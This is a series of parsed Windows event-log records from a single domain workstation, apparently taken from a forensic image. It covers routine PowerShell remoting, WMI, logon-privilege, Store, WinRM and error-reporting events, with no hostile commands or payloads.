{"ChunkNumber":250,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"\\t$item | Add-Member -Type NoteProperty -Name \\\"SID\\\" -Value  $SId\\n, \\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=721\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=adc556b8-0a10-4bc8-abac-9fac0e1de9f6\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=12462643-785f-4c49-b568-77280bb2c2e2\\n\\tPipelineId=3\\n\\tScriptName=\\n\\tCommandLine=\\t$item | Add-Member -Type NoteProperty -Name \\\"SID\\\" -Value  $SId\\n, CommandInvocation(Add-Member): \\\"Add-Member\\\"\\nParameterBinding(Add-Member): name=\\\"MemberType\\\"; value=\\\"NoteProperty\\\"\\nParameterBinding(Add-Member): name=\\\"Name\\\"; value=\\\"SID\\\"\\nParameterBinding(Add-Member): name=\\\"InputObject\\\"; value=\\\"\\\\\\\\BASE-RD-01\\\\root\\\\cimv2:Win32_Process.Handle=\\\"3700\\\"\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"6277","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T16:36:40.2026621+00:00","RecordNumber":6277}
{"PayloadData1":"PID: 8376","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":85,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"8376\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"14344","ProcessId":8376,"ThreadId":360,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-04T17:48:10.2566492+00:00","RecordNumber":14344}
{"ChunkNumber":119,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Returning 1 lease documents for contentid 0116DC02-781B-D1D1-FC1C-C80195511E17\"},{\"@Name\":\"Function\",\"#text\":\"ClipStorage::GetLeaseDocumentsForKeyDocument\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\clipstorage.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"495\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"263702","ProcessId":692,"ThreadId":10200,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T01:08:01.1305297+00:00","RecordNumber":263702}
{"PayloadData1":"PID: 5052","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":116,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"5052\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"17846","ProcessId":5052,"ThreadId":5888,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-06T21:17:03.0175943+00:00","RecordNumber":17846}
{"ChunkNumber":229,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Acquisition;Microsoft.WindowsStore_8wekyb3d8bbwe, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WERCDD5.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_c1b9de98742315dd6328144518611d70ae588dde_00000000_104f8f25, 0, 2b27f9f4-79fd-475d-ae99-3726f92510f7, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"262246","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-04T17:25:02.3965619+00:00","RecordNumber":262246}
{"PayloadData1":"Target: \\tdungan@stark-research-labs.com","PayloadData2":"TargetServerName: base-mail.shieldbase.lan","PayloadData3":"PID: 0x1FC0","UserName":"shieldbase\\tdungan","RemoteHost":"172.16.4.6:443","ExecutableInfo":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","MapDescription":"A logon was attempted using explicit credentials","ChunkNumber":602,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0xC9FAE\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TargetUserName\",\"#text\":\"tdungan@stark-research-labs.com\"},{\"@Name\":\"TargetDomainName\"},{\"@Name\":\"TargetLogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TargetServerName\",\"#text\":\"base-mail.shieldbase.lan\"},{\"@Name\":\"TargetInfo\",\"#text\":\"base-mail.shieldbase.lan\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x1FC0\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\"},{\"@Name\":\"IpAddress\",\"#text\":\"172.16.4.6\"},{\"@Name\":\"IpPort\",\"#text\":\"443\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4648,"EventRecordId":"53950","ProcessId":772,"ThreadId":10716,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T10:36:07.1812918+00:00","RecordNumber":53950}
{"PayloadData1":"PID: 3940","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":26,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"3940\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"7519","ProcessId":3940,"ThreadId":7996,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-08-31T12:57:41.4440919+00:00","RecordNumber":7519}
{"PayloadData1":"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"NT AUTHORITY\\SYSTEM (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":612,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"54691","ProcessId":772,"ThreadId":828,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-05T01:45:58.1432546+00:00","RecordNumber":54691}
{"ChunkNumber":11,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"ServiceName\",\"#text\":\"Microsoft Passport\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-HelloForBusiness/Operational","Provider":"Microsoft-Windows-HelloForBusiness","EventId":8025,"EventRecordId":"1710","ProcessId":1064,"ThreadId":7020,"Level":16,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-HelloForBusiness%4Operational.evtx","TimeCreated":"2018-08-30T19:08:59.4336930+00:00","RecordNumber":1710}
{"ChunkNumber":370,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x153003\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"TB_0_sharepoint.com\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"34717","ProcessId":776,"ThreadId":576,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-09T01:07:41.0437860+00:00","RecordNumber":34717}
{"ChunkNumber":20,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Invoking license manager because license/lease polling time up: PFN Microsoft.WindowsFeedbackHub_1.1712.1141.0_x64__8wekyb3d8bbwe\"},{\"@Name\":\"Function\",\"#text\":\"InvokeLicenseManagerRequired\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\apisethost\\\\activationapis.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"331\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"254333","ProcessId":868,"ThreadId":7788,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-03T11:54:48.2119455+00:00","RecordNumber":254333}
{"ChunkNumber":11,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Event\",\"#text\":\"8\"},{\"@Name\":\"SubscriberName\",\"#text\":\"SessionEnv\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1193","Channel":"Microsoft-Windows-Winlogon/Operational","Provider":"Microsoft-Windows-Winlogon","EventId":812,"EventRecordId":"1800","ProcessId":9576,"ThreadId":2628,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Winlogon%4Operational.evtx","TimeCreated":"2018-09-05T13:48:28.9484015+00:00","RecordNumber":1800}
{"PayloadData1":"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"shieldbase\\BASE-RD-01$ (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":254,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x2836DD11\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"24368","ProcessId":744,"ThreadId":1328,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-07-10T20:49:52.3553877+00:00","RecordNumber":24368}
{"ChunkNumber":38,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"\\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=2857\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=d9ac080b-6acf-4f30-80eb-6d19ec09810f\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=d485f447-a557-44b0-8d6f-46ed4e132a9a\\n\\tPipelineId=31\\n\\tScriptName=\\n\\tCommandLine=, CommandInvocation(Out-String): \\\"Out-String\\\"\\nCommandInvocation(Out-String): \\\"Out-String\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"1637","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T07:18:27.4807050+00:00","RecordNumber":1637}
{"ChunkNumber":192,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.522, 8024000b, 6FE34377-744E-4CB3-B041-5B1558786688, Download, 1, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WERB327.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.522_8e0506fc7409242b0e4fba862b89421e61c0e9_00000000_6eea4e86, 0, 4932decc-c67a-4280-9ce5-daddfcbe18e0, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"259895","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-04T05:24:33.2746771+00:00","RecordNumber":259895}
{"ChunkNumber":15,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Reason\",\"#text\":\"4\"},{\"@Name\":\"Status\",\"#text\":\"3221225653\"},{\"@Name\":\"ServerNameLength\",\"#text\":\"9\"},{\"@Name\":\"ServerName\",\"#text\":\"base-file\"},{\"@Name\":\"AddressLength\",\"#text\":\"16\"},{\"@Name\":\"RemoteAddress\",\"#text\":\"02-00-01-BD-0A-0A-04-05-00-00-00-00-00-00-00-00\"},{\"@Name\":\"LocalAddress\",\"#text\":\"02-00-00-00-AC-10-06-0B-00-00-00-00-00-00-00-00\"},{\"@Name\":\"InstanceNameLength\",\"#text\":\"24\"},{\"@Name\":\"InstanceName\",\"#text\":\"\\\\Device\\\\LanmanRedirector\"},{\"@Name\":\"ConnectionType\",\"#text\":\"1\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-SmbClient/Connectivity","Provider":"Microsoft-Windows-SMBClient","EventId":30822,"EventRecordId":"1980","ProcessId":4,"ThreadId":2904,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx","TimeCreated":"2018-07-12T08:29:02.0004890+00:00","RecordNumber":1980}
{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"GPOList\",\"#text\":\"Default Domain Policy, \"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Security-Audit-Configuration-Client/Operational","Provider":"Microsoft-Windows-Security-Audit-Configuration-Client","EventId":102,"EventRecordId":"635","ProcessId":8,"ThreadId":9588,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Security-Audit-Configuration-Client%4Operational.evtx","TimeCreated":"2018-06-28T00:49:53.1160256+00:00","RecordNumber":635}
{"ChunkNumber":2,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ErrorCode\",\"#text\":\"0x80070005\"},{\"@Name\":\"UserSID\",\"#text\":\"<machine>\"},{\"@Name\":\"Name\",\"#text\":\"Software\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModel\\\\Repository\\\\Families\\\\Windows.MiracastView_cw5n1h2txyewy\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-StateRepository/Operational","Provider":"Microsoft-Windows-StateRepository","EventId":253,"EventRecordId":"328","ProcessId":3676,"ThreadId":1816,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-StateRepository%4Operational.evtx","TimeCreated":"2018-05-14T12:14:54.1764768+00:00","RecordNumber":328}
{"PayloadData1":"Task \\Microsoft\\Office\\OfficeBackgroundTaskHandlerRegistration","PayloadData3":"Instance Id 15600223-c357-4cf7-ac9b-f0e315448085","ExecutableInfo":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe","MapDescription":"Scheduled task completed","ChunkNumber":196,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionSuccess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Office\\\\OfficeBackgroundTaskHandlerRegistration\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"15600223-c357-4cf7-ac9b-f0e315448085\"},{\"@Name\":\"ActionName\",\"#text\":\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Office16\\\\officebackgroundtaskhandler.exe\"},{\"@Name\":\"ResultCode\",\"#text\":\"0\"},{\"@Name\":\"EnginePID\",\"#text\":\"6096\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":201,"EventRecordId":"203425","ProcessId":556,"ThreadId":3848,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-09-01T13:53:56.5013775+00:00","RecordNumber":203425}
{"ChunkNumber":15,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"ServiceName\",\"#text\":\"Microsoft Passport\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-HelloForBusiness/Operational","Provider":"Microsoft-Windows-HelloForBusiness","EventId":8025,"EventRecordId":"2227","ProcessId":1064,"ThreadId":5144,"Level":16,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-HelloForBusiness%4Operational.evtx","TimeCreated":"2018-09-02T08:54:36.3217597+00:00","RecordNumber":2227}
{"ChunkNumber":53,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"}}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":132,"EventRecordId":"273331","ProcessId":1100,"ThreadId":2832,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-01T17:35:18.3349602+00:00","RecordNumber":273331}
{"ChunkNumber":28,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"3092","ProcessId":628,"ThreadId":4728,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-08T21:34:30.3229141+00:00","RecordNumber":3092}
{"ChunkNumber":38,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"InfoDescription\",\"#text\":\"%%4115\"}}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-GroupPolicy/Operational","Provider":"Microsoft-Windows-GroupPolicy","EventId":5320,"EventRecordId":"151799","ProcessId":556,"ThreadId":6936,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx","TimeCreated":"2018-09-02T19:28:27.1916961+00:00","RecordNumber":151799}
{"ChunkNumber":2,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"operationName\",\"#text\":\"EventDelivery\"}}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":132,"EventRecordId":"265855","ProcessId":1100,"ThreadId":1236,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-08-29T17:35:46.6830599+00:00","RecordNumber":265855}
{"ChunkNumber":41,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ContextInfo\",\"#text\":\"        Severity = Informational,         Host Name = ServerRemoteHost,         Host Version = 1.0.0.0,         Host ID = 3367239b-8f30-4f1e-aec8-b9f8c6869c28,         Host Application = C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding,         Engine Version = 5.1.16299.547,         Runspace ID = e666d539-477f-456c-a676-f835fdd52d52,         Pipeline ID = 5,         Command Name = Write-Verbose,         Command Type = Cmdlet,         Script Name = ,         Command Path = ,         Sequence Number = 2328,         User = shieldbase\\\\cbarton-a,         Connected User = shieldbase\\\\cbarton-a,         Shell ID = Microsoft.PowerShell, \"},{\"@Name\":\"UserData\"},{\"@Name\":\"Payload\",\"#text\":\"CommandInvocation(Write-Verbose): \\\"Write-Verbose\\\", ParameterBinding(Write-Verbose): name=\\\"Message\\\"; value=\\\"Adding 54FFD262-99FE-4576-96E7-1ADB500370DC:Microsoft-Windows-Wordpad to $LogProviders hash.\\\", \"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1185","Channel":"Microsoft-Windows-PowerShell/Operational","Provider":"Microsoft-Windows-PowerShell","EventId":4103,"EventRecordId":"5695","ProcessId":14292,"ThreadId":3384,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-PowerShell%4Operational.evtx","TimeCreated":"2018-08-15T16:32:43.8300320+00:00","RecordNumber":5695}
{"ChunkNumber":3,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"FailureTime\",\"#text\":\"2018-08-06 19:27:22.9680151\"},{\"@Name\":\"StackHash\",\"#text\":\"0xC374C042\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational","Provider":"Microsoft-Windows-Security-LessPrivilegedAppContainer","EventId":1,"EventRecordId":"443","ProcessId":3596,"ThreadId":5040,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx","TimeCreated":"2018-08-06T19:27:22.9680151+00:00","RecordNumber":443}
{"PayloadData1":"HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile","PayloadData2":"HostName=Default Host","PayloadData3":"HostVersion=5.1.16299.547","MapDescription":"Provider is Started.","ChunkNumber":79,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"Function, Started, \\tProviderName=Function\\n\\tNewProviderState=Started\\n\\n\\tSequenceNumber=61\\n\\n\\tHostName=Default Host\\n\\tHostVersion=5.1.16299.547\\n\\tHostId=8ed6daf1-21b4-48ae-b89f-020af167d8cc\\n\\tHostApplication=C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile\\n\\tEngineVersion=\\n\\tRunspaceId=\\n\\tPipelineId=\\n\\tCommandName=\\n\\tCommandType=\\n\\tScriptName=\\n\\tCommandPath=\\n\\tCommandLine=\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":600,"EventRecordId":"2868","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T07:19:21.7169762+00:00","RecordNumber":2868}
{"ChunkNumber":66,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/SubscriptionManager/Subscription\"}]}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"275204","ProcessId":1100,"ThreadId":1524,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-02T11:10:03.0227452+00:00","RecordNumber":275204}
